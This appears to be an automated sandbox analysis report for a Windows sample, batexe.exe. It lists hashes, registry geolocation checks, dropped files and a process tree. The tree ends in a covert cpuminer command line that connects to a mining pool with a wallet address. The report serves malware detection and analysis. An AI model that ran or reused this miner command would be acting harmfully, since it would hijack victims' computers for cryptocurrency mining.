73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
19/02/2024, 16:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5048	b2e.exe
1688	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3128-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3128 wrote to memory of 5048	3128	batexe.exe	84
PID 3128 wrote to memory of 5048	3128	batexe.exe	84
PID 3128 wrote to memory of 5048	3128	batexe.exe	84
PID 5048 wrote to memory of 3324	5048	b2e.exe	85
PID 5048 wrote to memory of 3324	5048	b2e.exe	85
PID 5048 wrote to memory of 3324	5048	b2e.exe	85
PID 3324 wrote to memory of 1688	3324	cmd.exe	88
PID 3324 wrote to memory of 1688	3324	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3128
- C:\Users\Admin\AppData\Local\Temp\9635.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9635.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9635.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9C9E.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3324
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9635.tmp\b2e.exe

Filesize
3.8MB

MD5
9501526510747aed86e7bbe9a6934ce9

SHA1
fb5da6760effa50c1316854369ed7075065fd29c

SHA256
e9fc0cd68a614765e19caa069369d2c2877402920f07ef1f7e984364e38eff31

SHA512
f678ba698454e64f244933d3d9a51882b7b849c44a1e0371555883e088a901b5e59a3c64452b1198552dc89ecc41f2c473802b07cd23c89e3b6f30a08a67bf6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\9635.tmp\b2e.exe

Filesize
943KB

MD5
e556ed34e3c99b5b1f40010da81db144

SHA1
3c21f3e9acb45fff40e1d5ab7b57f329626259ba

SHA256
d87c3279125c5e566b8097bb69863ce3213d6ca3df81159f1b9de41b18268854

SHA512
c42ce5392b1454f71e2a493ac673d17fa096c3866e9b18195e4a5a2fec4dd29c163b7612f2375f5283b994a22d9134c55cf39b373c7cf46fe1364754f1fc8037

Download Submit
C:\Users\Admin\AppData\Local\Temp\9635.tmp\b2e.exe

Filesize
1.0MB

MD5
30aff5366c9e0e6a9ded55ba2df01dc7

SHA1
e6d2949e545161cb0ae2eea2e132e0197297ba75

SHA256
74ab3d3616f486dc811727230c8d7425c5f6969c2b32e2a9d9ca762cf9582cd5

SHA512
ab11f3438196431deb53abd785610ccc0a5e17e6c4e489602dd7a05e6530f7a29dba2b569cacf0120633017e7ec426f4d5e5d736182da67d4d4cebede020f7c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\9C9E.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
144KB

MD5
a30c6823ff22b26ad54a01fc973e407f

SHA1
a0aabbc0fd392db0e86bfa6e3fe58a08c059fcaa

SHA256
e48651c67a838c209189b85a943ac03ce78328696634a5abc11c7b0e7a00bc1b

SHA512
afca6eadd8d10adaa6fd1bae493c5af78f4fd12cfe605c2f0f2d76920c9d1a4a42208f3382dedaddade4ae4aab7aaf34bdb4c455f03b0675cfaca9dffc36d217

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
192KB

MD5
01f228e3eadcf394f8e57348314c7104

SHA1
71571d5d327678688e7c77f19509a17781ae17d0

SHA256
c38983cab3c0de4a73e61d6ed2abcee2567becbfca4b1714d3b03389556880f6

SHA512
eb40b33112cf913383b22dbf4d2977e4c8cee5123620efea1b10d0e5e5d1495e37b12c5f2da0cc778af2044d6f7667ed7b009c019f7e03cdf5f060623f4ce9e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
401KB

MD5
28283d956d3fbbfb9f0a82c74ffbca00

SHA1
562bdc943a3b152d248e5191c16f782dfbba817f

SHA256
36db1c6bd5ebb12a2faba32eb7230cfd47b501f07faad8d894c1a62b27ce7535

SHA512
78684d5c3aad2ff28d5df5aaa7817d664e28b21f5d09011dd406cb11a2344b85d48198f40420eb25b26377bf72a1c61ee609ee7a6e970eb4cce600522fd0230b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
48KB

MD5
79fb7c96ea8b4f5f2c510ffac7e8a404

SHA1
05a29d9ddfaf4e71592c9294651493626e993406

SHA256
de701f5b6990de628df3c7fc2f07d04492153094940d681dbea8360e9effb8cb

SHA512
ecb2e67786434c449b02a2d7b5fc150e3503780fe36b83f51257c652040ad8f2cb82f6c5213133747f1be2d5f135ef4c4024c01d6046749a18b42593de5b07cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
405KB

MD5
1beb6dc33aea4c2caa5756926c25fba5

SHA1
27e59cbe4cb0f8c1ec88b06fc0675b67c8c81bae

SHA256
e9a533ee7764355ccb3fe6fca222186dfa3f02d4344f305a8b03fc3fc84a5f22

SHA512
7eef96e664f5e5a2f92e524bd6e96471c7874c541cbcc2f57e7db1d18131811408f0540e215d77a720aea3752cd02b544a6b55529a954dd4fab1fb7e820e11a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
148KB

MD5
3b6e069d7c7968d585e705ca28e4f2fc

SHA1
83f7b7a3d9fe329a50b6d269356699138d12fe38

SHA256
e71aade9760a8f523bdca24265ac0693d2a297113c99f696d650ba51dab054e5

SHA512
239103d94cadd9ece98e48cb4f21b0b1c83c56ac57f868a1101431e1965ddee10c4bc2208432731894bc86798dafa057f9b64046aea1bed612bb13398b1d4981

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
174KB

MD5
f82c8c81c78a537813b0ba763580b9ce

SHA1
21d9bb44f1bcf72fccc0751c74691a70db62fef7

SHA256
86967273ef9fcb76fb2d35740f8060b504f7229ccdcfde5da59d7d897de763a5

SHA512
a4f5e3c1fe2d681148d7f4accfd8dd407d463adf7a29446d96d629d9e135f8ca59809fe90f9c825b5f046f24140b56763ddba23b06fb072bc25a96639b364c67

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
51KB

MD5
1ee390c3e239bc5378ac164a21f6bf64

SHA1
2ab763ef2a734457f7baee38eafce6f1aa5ccdeb

SHA256
8ce2a02d5ec15b852b021b33f6b41fa3a2797b43abadb9867b055c78b6c1dbf6

SHA512
ea7e5d60c66475d8dcdad46ff38494fd2bbba0c3ad08c42b56039a17dce92df1b62c32894cec5d151a2987874000a290d35bf3c3be5d7b7dc2c91075cc344328

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
543KB

MD5
3d73e7a155e8126dcab4faee33cb4cea

SHA1
05de579637ee080ac34ff99cc7dd27343c617386

SHA256
22f9c76124502753487c610fb4eae0f7f86b85401773843e445b03e3525adb9b

SHA512
0c356a6b9279279d0021928956e54298ccf3e8bc10e36f5d40500191d687b4622324b8fc34949f41fbc8bb8086c011a2bc3e175986a27973c91fae570ab8d766

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
282KB

MD5
d412b5d52773cc74d0ab87e93df1deb7

SHA1
a5096f318b480b9353df58f4adfd758438e6fadf

SHA256
c199c988acd6fad6a7599afb36e948498e788e90853a22d5fc95dbd4c30efc82

SHA512
e65b7fcf81450aa7011bb96d9c47e3cb0dae0ff60f7ddf4a7f4b34251095685eebfbde7866b48bdaf5c2d465735723e69ffd7e2fc60d31c8d13310fc13853b2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
132KB

MD5
e090bc96194b91d69e40f54993b2e58a

SHA1
9d3537b556c2104fce9c2c621deae76ba00d8792

SHA256
3a1923ea943b9313ac0148248aeba821c7e137c459ec0966bfba11badae14a7c

SHA512
30c2d141c41a064667cba683bb0ec44fbf730e78190db81ef2fad6e17385a1af10e233077cbec65ed38880578a0132bfb9121a798669a276de7afa006692f9b2

Download Submit
memory/1688-47-0x0000000001030000-0x00000000028E5000-memory.dmp

Filesize
24.7MB

Download
memory/1688-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1688-46-0x0000000061140000-0x00000000611D8000-memory.dmp

Filesize
608KB

Download
memory/1688-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1688-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3128-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5048-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5048-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download